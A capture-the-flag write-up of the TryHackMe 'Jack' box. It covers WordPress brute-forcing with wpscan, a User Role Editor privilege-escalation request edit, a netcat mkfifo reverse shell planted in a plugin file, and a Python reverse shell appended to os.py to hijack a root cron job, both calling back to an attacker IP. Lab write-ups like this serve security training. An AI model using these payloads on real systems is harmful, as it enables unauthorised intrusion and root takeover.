TryHackMe - Jack

Jack

Getting Root

1. We start by enumerating the box and notice that its running WordPress. Then using the wpscan tool, we can enumerate users and get some credentials by brute-forcing the application.

2. To get a reverse shell we escalate our privileges from normal user to administrator on WordPress and then edit the php file and inject our reverse shell code

3. After getting a reverse shell as user www-data, we can find the id_rsa ssh key of jack

4. After enumerating the box with linpeas.sh, we notice that there is a cron job executed by root which is running a script that imports the os module which we have read and write access.

5. We modify the os module and get a reverse shell as root.

Tools Used:

nmap, wpscan, Burp, pspy

Nmap

# nmap -A  10.10.186.74
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 14:55 EDT
Nmap scan report for jack.thm (10.10.186.74)
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA)
|   256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA)
|_  256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 5.3.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jack's Personal Site – Blog for Jacks writing adven...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.19 seconds

Enumeration

There is a note saying we should add jack.thm to the /etc/hosts

Edit your /etc/hosts file and add:

10.10.186.74    jack.thm

Port 80 - WordPress

Visiting the site

From the nmap results, we can see the /wp-admin/ in the results which takes us to the WordPress login form, but we don't have any credentials yet.

Using WPScan

I used the following command below to enumerate users.

wpscan --url jack.thm -e u

Users Found:

We create a file named users.txt and those usernames. Now we can try to brute force WordPress and see if we get lucky.

Use the -h to get help for wpscan, but basically -U is the file with the users, -P is the password wordlist I used, and then the --url to point it to the target.

wpscan -U users.txt -P /usr/share/wordlists/fasttrack.txt --url jack.thm

After a few minutes, we get the password for wendy and we can successfully login.

Exploitation

After login into the dashboard, there is no much we can do to get a reverse shell, however there is an exploit that allow us to get administrator privileges on the WordPress dashboard and that should help us get some code execution.

WordPress Plugin User Role Editor < 4.25 - Privilege EscalationExploit Database

You can use metasploit, but we are going to do it manually.

The first thing we need to do, is start Burp Suite and intercept the requests. Then, we go to Profile

Click Update Profile

The request will look as follows

Add the following to the Request (our change was added before &action)

&ure_other_roles=administrator&

The edited request should look like this

Then click forward to allow Burp to send the edited request, and your dashboard should now look as follows:

Getting a Shell

Go to Plugin Editor

You will be prompted with a Warning letting you know that you should not be editing the plugins directly. Click "I understand"

Now we are going to add our code and hopefully get a reverse shell

We are going to use the following to get our reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.7.188 9001 >/tmp/f

Click on Update File

Triggering the code and getting a shell

We start our listener

# rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001

We go to Installed Plugins and click Activate

And, we get a shell

To get a proper shell, follow the following steps:

# In reverse shell
$ /usr/bin/python3.5 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-Z

# In Attacker console
stty -a
stty raw -echo
fg

# In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>  

Privilege Escalation

We can get the user flag and continue enumerating.

www-data@jack:/home/jack$ ls -la
ls -la
total 40
drwxr-xr-x 4 jack jack 4096 May 13 13:24 .
drwxr-xr-x 3 root root 4096 Jan  8 11:21 ..
lrwxrwxrwx 1 jack jack    9 Jan 10 09:29 .bash_history -> /dev/null
-rw-r--r-- 1 jack jack  220 Jan  8 11:21 .bash_logout
-rw-r--r-- 1 jack jack 3771 Jan  8 11:21 .bashrc
drwx------ 2 jack jack 4096 Jan  9 09:57 .cache
-rw-r--r-- 1 jack jack  655 Jan  8 11:21 .profile
drwx------ 2 jack jack 4096 Jan 10 18:33 .ssh
-rw------- 1 jack jack 1820 May 13 13:24 .viminfo
-rw-r--r-- 1 root root  140 Jan 10 15:08 reminder.txt
-rw-rw-r-- 1 jack jack   33 Jan 10 09:33 user.txt
www-data@jack:/home/jack$ ls -l
ls -l
total 8
-rw-r--r-- 1 root root 140 Jan 10 15:08 reminder.txt
-rw-rw-r-- 1 jack jack  33 Jan 10 09:33 user.txt
www-data@jack:/home/jack$ 

Checking out the reminder.txt file, we noticed something related to backups, so we do some enumeration and find a backups folder with an ssh key which we can use to login as jack.

www-data@jack:/home/jack$ cat reminder.txt
cat reminder.txt

Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back.  

www-data@jack:/home/jack$

We search for a directory named backup and we find something under /var

# find / -type d -name backup* -ls 2>/dev/null 
www-data@jack:/home/jack$ find / -type d -name backup* 2>/dev/null 
find / -type d -name backup* 2>/dev/null 
/var/backups
www-data@jack:/home/jack$ 


# Checking the backups
www-data@jack:/home/jack$ ls -ld /var/backups
ls -ld /var/backups
drwxr-xr-x 2 root root 4096 Jan 10 15:05 /var/backups

List of files under /var/backups

We can login as user jack after changing the permissions of the id_rsa to 600

chmod 600 id_rsa

Using pspy to monitor the processes that are running, we notice that root has a cronjob running every minute. The script is located at /opt/statuscheck/checker.py

The contents of the script shows that it imports the python module os

With all that information we discovered, it's time to do some further enumeration. We noticed that the user jack is part of the family group which has the ability to write on any files under the /usr/lib/python2.7/ directory. This is good because the os module is under that directory and our user jack has write access to that module.

# Checking the user jack
www-data@jack:/home/jack$ id jack
id jack
uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family)  

To exploit this, we edit the /usr/lib/python2.7/os.py module and add the following reverse shell all the way at the end.

import socket
import pty
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.11.7.188",9008))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")

We start a listener and wait a minute for the cronjob to run, and we get a root shell.

Ncat: Listening on :::9008
Ncat: Listening on 0.0.0.0:9008
Ncat: Connection from 10.10.186.74.
Ncat: Connection from 10.10.186.74:57942.
root@jack:~# id
id
uid=0(root) gid=0(root) groups=0(root)